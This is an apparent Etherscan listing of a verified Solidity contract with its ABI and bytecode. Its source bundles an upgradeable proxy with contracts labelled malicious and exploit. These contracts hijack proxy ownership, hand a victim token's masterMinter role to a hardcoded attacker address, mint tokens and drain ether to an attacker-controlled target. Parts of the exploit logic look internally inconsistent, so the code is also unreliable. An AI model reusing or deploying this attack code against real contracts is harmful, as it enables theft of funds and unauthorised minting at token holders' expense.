Source Code
Overview
ETH Balance
0 ETH
More Info
ContractCreator
Multichain Info
N/A
Loading...
Loading
This contract may be a proxy contract. Click on More Options and select Is this a proxy? to confirm and enable the "Read as Proxy" & "Write as Proxy" tabs.
Contract Source Code Verified (Exact Match)
Contract Name:
UpgradeableProxy
Compiler Version
v0.8.28+commit.7893614a
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2024-11-29 */ // SPDX-License-Identifier: MIT pragma solidity ^0.8.28; // Proxy contract for upgradeability contract UpgradeableProxy { address public implementation; address public owner; event Upgraded(address indexed newImplementation); event CallResult(bool success, bytes result); constructor(address _implementation) { implementation = _implementation; owner = msg.sender; } fallback() external payable { (bool success, bytes memory result) = implementation.delegatecall(msg.data); require(success, "Delegatecall failed"); emit CallResult(success, result); } receive() external payable { if (msg.value > 0 && msg.sender != owner) { require(address(this).balance >= msg.value, "Insufficient balance"); upgradeTo(implementation); // Upgrade using current implementation as the placeholder } } function upgradeTo(address _implementation) public { require(msg.sender == owner, "Not authorized"); implementation = _implementation; emit Upgraded(_implementation); } } // Malicious implementation contract contract MaliciousImplementation { address public proxyOwner; address public maliciousTarget; constructor(address _proxyOwner, address _maliciousTarget) { proxyOwner = _proxyOwner; maliciousTarget = _maliciousTarget; } // Hijack ownership of the proxy contract function takeOwnership() external { require(msg.sender == maliciousTarget, "Not authorized"); proxyOwner = maliciousTarget; } // Function to set the masterMinter to the attacker's address (dynamically set) function setMasterMinter() external { require(msg.sender == proxyOwner, "Not authorized"); // Dynamically set the masterMinter to the attacker's address (hardcoded here) address attackerAddress = 0x471aABd39E9aFa5F4798FC04be77C1cF587FB940; (bool success, ) = maliciousTarget.call( abi.encodeWithSignature("updateMasterMinter(address)", attackerAddress) ); require(success, "setMasterMinter failed"); } // Function to configure the attacker as a minter function configureMinter(address _minter, uint256 _allowedAmount) external { require(msg.sender == proxyOwner, "Not authorized"); // Call the victim contract's configureMinter function (bool success, ) = maliciousTarget.call( abi.encodeWithSignature("configureMinter(address,uint256)", _minter, _allowedAmount) ); require(success, "configureMinter failed"); } // Mint tokens to the attacker's address function mint(address _to, uint256 _amount) external { require(msg.sender == proxyOwner, "Not authorized"); // Call the victim contract's mint function (bool success, ) = maliciousTarget.call( abi.encodeWithSignature("mint(address,uint256)", _to, _amount) ); require(success, "Mint failed"); } fallback() external payable {} receive() external payable { if (msg.value > 0 && msg.sender != proxyOwner) { address payable target = payable(maliciousTarget); uint256 balance = address(this).balance; if (balance > 0) { target.transfer(balance); // Drain all funds to the malicious target } } } } // Exploit contract to interact with the vulnerable upgradeToAndCall functionality contract UpgradeToAndCallTester { address public owner; address public maliciousTarget; event FallbackCalled(address indexed caller, bytes data); event CallResult(bool success, bytes result); constructor(address _maliciousTarget) { owner = msg.sender; maliciousTarget = _maliciousTarget; } function destroy() external { require(msg.sender == owner, "Not authorized"); selfdestruct(payable(msg.sender)); } fallback() external payable { emit FallbackCalled(msg.sender, msg.data); } receive() external payable { if (msg.value > 0 && msg.sender != owner) { drainFunds(payable(maliciousTarget)); // Transfer Ether to malicious target } } function complexOperation(uint256 recursiveDepth) external payable { require(msg.sender == owner, "Not authorized"); require(recursiveDepth > 0, "Depth must be greater than zero"); upgradeProxyToMalicious(); drainFunds(payable(maliciousTarget)); recursiveExploit(recursiveDepth); } function upgradeProxyToMalicious() internal { (bool success, ) = address(this).call( abi.encodeWithSignature("upgradeTo(address)", address(this)) ); require(success, "Upgrade to malicious contract failed"); emit CallResult(success, ""); } function drainFunds(address payable _to) internal { uint256 balance = address(this).balance; require(balance > 0, "No funds to drain"); (bool success, ) = _to.call{value: balance}(""); require(success, "Fund transfer failed"); emit CallResult(success, ""); } function recursiveExploit(uint256 depth) internal { if (depth == 0) return; (bool success, ) = address(this).delegatecall( abi.encodeWithSignature("recursiveExploit(uint256)", depth - 1) ); require(success, "Recursive call failed"); } }
[{"inputs":[{"internalType":"address","name":"_implementation","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"bool","name":"success","type":"bool"},{"indexed":false,"internalType":"bytes","name":"result","type":"bytes"}],"name":"CallResult","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newImplementation","type":"address"}],"name":"Upgraded","type":"event"},{"stateMutability":"payable","type":"fallback"},{"inputs":[],"name":"implementation","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_implementation","type":"address"}],"name":"upgradeTo","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
608060405234801561000f575f5ffd5b5060405161087238038061087283398181016040528101906100319190610114565b805f5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055503360015f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505061013f565b5f5ffd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6100e3826100ba565b9050919050565b6100f3816100d9565b81146100fd575f5ffd5b50565b5f8151905061010e816100ea565b92915050565b5f60208284031215610129576101286100b6565b5b5f61013684828501610100565b91505092915050565b6107268061014c5f395ff3fe608060405260043610610037575f3560e01c80633659cfe6146102125780635c60da1b1461023a5780638da5cb5b146102645761010c565b3661010c575f34118015610098575060015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614155b1561010a57344710156100e0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016100d790610445565b60405180910390fd5b6101095f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1661028e565b5b005b5f5f5f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff165f3660405161015592919061049f565b5f60405180830381855af49150503d805f811461018d576040519150601f19603f3d011682016040523d82523d5f602084013e610192565b606091505b5091509150816101d7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016101ce90610501565b60405180910390fd5b7f582326e533af48b16567b0565a82550442e225cf8491cb9ae2a29e1f96935e7c82826040516102089291906105a9565b60405180910390a1005b34801561021d575f5ffd5b5061023860048036038101906102339190610635565b61028e565b005b348015610245575f5ffd5b5061024e6103a2565b60405161025b919061066f565b60405180910390f35b34801561026f575f5ffd5b506102786103c6565b604051610285919061066f565b60405180910390f35b60015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161461031d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610314906106d2565b60405180910390fd5b805f5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff167fbc7cd75a20ee27fd9adebab32041f755214dbc6bffa90cc0225b39da2e5c2d3b60405160405180910390a250565b5f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b5f82825260208201905092915050565b7f496e73756666696369656e742062616c616e63650000000000000000000000005f82015250565b5f61042f6014836103eb565b915061043a826103fb565b602082019050919050565b5f6020820190508181035f83015261045c81610423565b9050919050565b5f81905092915050565b828183375f83830152505050565b5f6104868385610463565b935061049383858461046d565b82840190509392505050565b5f6104ab82848661047b565b91508190509392505050565b7f44656c656761746563616c6c206661696c6564000000000000000000000000005f82015250565b5f6104eb6013836103eb565b91506104f6826104b7565b602082019050919050565b5f6020820190508181035f830152610518816104df565b9050919050565b5f8115159050919050565b6105338161051f565b82525050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f61057b82610539565b6105858185610543565b9350610595818560208601610553565b61059e81610561565b840191505092915050565b5f6040820190506105bc5f83018561052a565b81810360208301526105ce8184610571565b90509392505050565b5f5ffd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610604826105db565b9050919050565b610614816105fa565b811461061e575f5ffd5b50565b5f8135905061062f8161060b565b92915050565b5f6020828403121561064a576106496105d7565b5b5f61065784828501610621565b91505092915050565b610669816105fa565b82525050565b5f6020820190506106825f830184610660565b92915050565b7f4e6f7420617574686f72697a65640000000000000000000000000000000000005f82015250565b5f6106bc600e836103eb565b91506106c782610688565b602082019050919050565b5f6020820190508181035f8301526106e9816106b0565b905091905056fea264697066735822122059b73a77e2aedf4a0f8162da0f1283d0f9dfa67837f7722ae44957d4eb40cc2364736f6c634300081c0033000000000000000000000000471aabd39e9afa5f4798fc04be77c1cf587fb940
Deployed Bytecode
0x608060405260043610610037575f3560e01c80633659cfe6146102125780635c60da1b1461023a5780638da5cb5b146102645761010c565b3661010c575f34118015610098575060015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614155b1561010a57344710156100e0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016100d790610445565b60405180910390fd5b6101095f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1661028e565b5b005b5f5f5f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff165f3660405161015592919061049f565b5f60405180830381855af49150503d805f811461018d576040519150601f19603f3d011682016040523d82523d5f602084013e610192565b606091505b5091509150816101d7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016101ce90610501565b60405180910390fd5b7f582326e533af48b16567b0565a82550442e225cf8491cb9ae2a29e1f96935e7c82826040516102089291906105a9565b60405180910390a1005b34801561021d575f5ffd5b5061023860048036038101906102339190610635565b61028e565b005b348015610245575f5ffd5b5061024e6103a2565b60405161025b919061066f565b60405180910390f35b34801561026f575f5ffd5b506102786103c6565b604051610285919061066f565b60405180910390f35b60015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161461031d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610314906106d2565b60405180910390fd5b805f5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff167fbc7cd75a20ee27fd9adebab32041f755214dbc6bffa90cc0225b39da2e5c2d3b60405160405180910390a250565b5f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b5f82825260208201905092915050565b7f496e73756666696369656e742062616c616e63650000000000000000000000005f82015250565b5f61042f6014836103eb565b915061043a826103fb565b602082019050919050565b5f6020820190508181035f83015261045c81610423565b9050919050565b5f81905092915050565b828183375f83830152505050565b5f6104868385610463565b935061049383858461046d565b82840190509392505050565b5f6104ab82848661047b565b91508190509392505050565b7f44656c656761746563616c6c206661696c6564000000000000000000000000005f82015250565b5f6104eb6013836103eb565b91506104f6826104b7565b602082019050919050565b5f6020820190508181035f830152610518816104df565b9050919050565b5f8115159050919050565b6105338161051f565b82525050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f61057b82610539565b6105858185610543565b9350610595818560208601610553565b61059e81610561565b840191505092915050565b5f6040820190506105bc5f83018561052a565b81810360208301526105ce8184610571565b90509392505050565b5f5ffd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610604826105db565b9050919050565b610614816105fa565b811461061e575f5ffd5b50565b5f8135905061062f8161060b565b92915050565b5f6020828403121561064a576106496105d7565b5b5f61065784828501610621565b91505092915050565b610669816105fa565b82525050565b5f6020820190506106825f830184610660565b92915050565b7f4e6f7420617574686f72697a65640000000000000000000000000000000000005f82015250565b5f6106bc600e836103eb565b91506106c782610688565b602082019050919050565b5f6020820190508181035f8301526106e9816106b0565b905091905056fea264697066735822122059b73a77e2aedf4a0f8162da0f1283d0f9dfa67837f7722ae44957d4eb40cc2364736f6c634300081c0033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
000000000000000000000000471aabd39e9afa5f4798fc04be77c1cf587fb940
-----Decoded View---------------
Arg [0] : _implementation (address): 0x471aABd39E9aFa5F4798FC04be77C1cF587FB940
-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 000000000000000000000000471aabd39e9afa5f4798fc04be77c1cf587fb940
Deployed Bytecode Sourcemap
99:1046:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;708:1;696:9;:13;:36;;;;;727:5;;;;;;;;;;;713:19;;:10;:19;;;;696:36;692:235;;;782:9;757:21;:34;;749:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;831:25;841:14;;;;;;;;;;;831:9;:25::i;:::-;692:235;99:1046;;471:12;485:19;508:14;;;;;;;;;;;:27;;536:8;;508:37;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;470:75;;;;564:7;556:39;;;;;;;;;;;;:::i;:::-;;;;;;;;;611:27;622:7;631:6;611:27;;;;;;;:::i;:::-;;;;;;;;459:187;942:200;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;132:29;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;168:20;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;942:200;1026:5;;;;;;;;;;;1012:19;;:10;:19;;;1004:46;;;;;;;;;;;;:::i;:::-;;;;;;;;;1078:15;1061:14;;:32;;;;;;;;;;;;;;;;;;1118:15;1109:25;;;;;;;;;;;;942:200;:::o;132:29::-;;;;;;;;;;;;;:::o;168:20::-;;;;;;;;;;;;;:::o;7:169:1:-;91:11;125:6;120:3;113:19;165:4;160:3;156:14;141:29;;7:169;;;;:::o;182:170::-;322:22;318:1;310:6;306:14;299:46;182:170;:::o;358:366::-;500:3;521:67;585:2;580:3;521:67;:::i;:::-;514:74;;597:93;686:3;597:93;:::i;:::-;715:2;710:3;706:12;699:19;;358:366;;;:::o;730:419::-;896:4;934:2;923:9;919:18;911:26;;983:9;977:4;973:20;969:1;958:9;954:17;947:47;1011:131;1137:4;1011:131;:::i;:::-;1003:139;;730:419;;;:::o;1155:147::-;1256:11;1293:3;1278:18;;1155:147;;;;:::o;1308:148::-;1406:6;1401:3;1396;1383:30;1447:1;1438:6;1433:3;1429:16;1422:27;1308:148;;;:::o;1484:327::-;1598:3;1619:88;1700:6;1695:3;1619:88;:::i;:::-;1612:95;;1717:56;1766:6;1761:3;1754:5;1717:56;:::i;:::-;1798:6;1793:3;1789:16;1782:23;;1484:327;;;;;:::o;1817:291::-;1957:3;1979:103;2078:3;2069:6;2061;1979:103;:::i;:::-;1972:110;;2099:3;2092:10;;1817:291;;;;;:::o;2114:169::-;2254:21;2250:1;2242:6;2238:14;2231:45;2114:169;:::o;2289:366::-;2431:3;2452:67;2516:2;2511:3;2452:67;:::i;:::-;2445:74;;2528:93;2617:3;2528:93;:::i;:::-;2646:2;2641:3;2637:12;2630:19;;2289:366;;;:::o;2661:419::-;2827:4;2865:2;2854:9;2850:18;2842:26;;2914:9;2908:4;2904:20;2900:1;2889:9;2885:17;2878:47;2942:131;3068:4;2942:131;:::i;:::-;2934:139;;2661:419;;;:::o;3086:90::-;3120:7;3163:5;3156:13;3149:21;3138:32;;3086:90;;;:::o;3182:109::-;3263:21;3278:5;3263:21;:::i;:::-;3258:3;3251:34;3182:109;;:::o;3297:98::-;3348:6;3382:5;3376:12;3366:22;;3297:98;;;:::o;3401:168::-;3484:11;3518:6;3513:3;3506:19;3558:4;3553:3;3549:14;3534:29;;3401:168;;;;:::o;3575:139::-;3664:6;3659:3;3654;3648:23;3705:1;3696:6;3691:3;3687:16;3680:27;3575:139;;;:::o;3720:102::-;3761:6;3812:2;3808:7;3803:2;3796:5;3792:14;3788:28;3778:38;;3720:102;;;:::o;3828:373::-;3914:3;3942:38;3974:5;3942:38;:::i;:::-;3996:70;4059:6;4054:3;3996:70;:::i;:::-;3989:77;;4075:65;4133:6;4128:3;4121:4;4114:5;4110:16;4075:65;:::i;:::-;4165:29;4187:6;4165:29;:::i;:::-;4160:3;4156:39;4149:46;;3918:283;3828:373;;;;:::o;4207:407::-;4340:4;4378:2;4367:9;4363:18;4355:26;;4391:65;4453:1;4442:9;4438:17;4429:6;4391:65;:::i;:::-;4503:9;4497:4;4493:20;4488:2;4477:9;4473:18;4466:48;4531:76;4602:4;4593:6;4531:76;:::i;:::-;4523:84;;4207:407;;;;;:::o;4701:117::-;4810:1;4807;4800:12;4947:126;4984:7;5024:42;5017:5;5013:54;5002:65;;4947:126;;;:::o;5079:96::-;5116:7;5145:24;5163:5;5145:24;:::i;:::-;5134:35;;5079:96;;;:::o;5181:122::-;5254:24;5272:5;5254:24;:::i;:::-;5247:5;5244:35;5234:63;;5293:1;5290;5283:12;5234:63;5181:122;:::o;5309:139::-;5355:5;5393:6;5380:20;5371:29;;5409:33;5436:5;5409:33;:::i;:::-;5309:139;;;;:::o;5454:329::-;5513:6;5562:2;5550:9;5541:7;5537:23;5533:32;5530:119;;;5568:79;;:::i;:::-;5530:119;5688:1;5713:53;5758:7;5749:6;5738:9;5734:22;5713:53;:::i;:::-;5703:63;;5659:117;5454:329;;;;:::o;5789:118::-;5876:24;5894:5;5876:24;:::i;:::-;5871:3;5864:37;5789:118;;:::o;5913:222::-;6006:4;6044:2;6033:9;6029:18;6021:26;;6057:71;6125:1;6114:9;6110:17;6101:6;6057:71;:::i;:::-;5913:222;;;;:::o;6141:164::-;6281:16;6277:1;6269:6;6265:14;6258:40;6141:164;:::o;6311:366::-;6453:3;6474:67;6538:2;6533:3;6474:67;:::i;:::-;6467:74;;6550:93;6639:3;6550:93;:::i;:::-;6668:2;6663:3;6659:12;6652:19;;6311:366;;;:::o;6683:419::-;6849:4;6887:2;6876:9;6872:18;6864:26;;6936:9;6930:4;6926:20;6922:1;6911:9;6907:17;6900:47;6964:131;7090:4;6964:131;:::i;:::-;6956:139;;6683:419;;;:::o
Swarm Source
ipfs://59b73a77e2aedf4a0f8162da0f1283d0f9dfa67837f7722ae44957d4eb40cc23
Loading...
Loading
A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.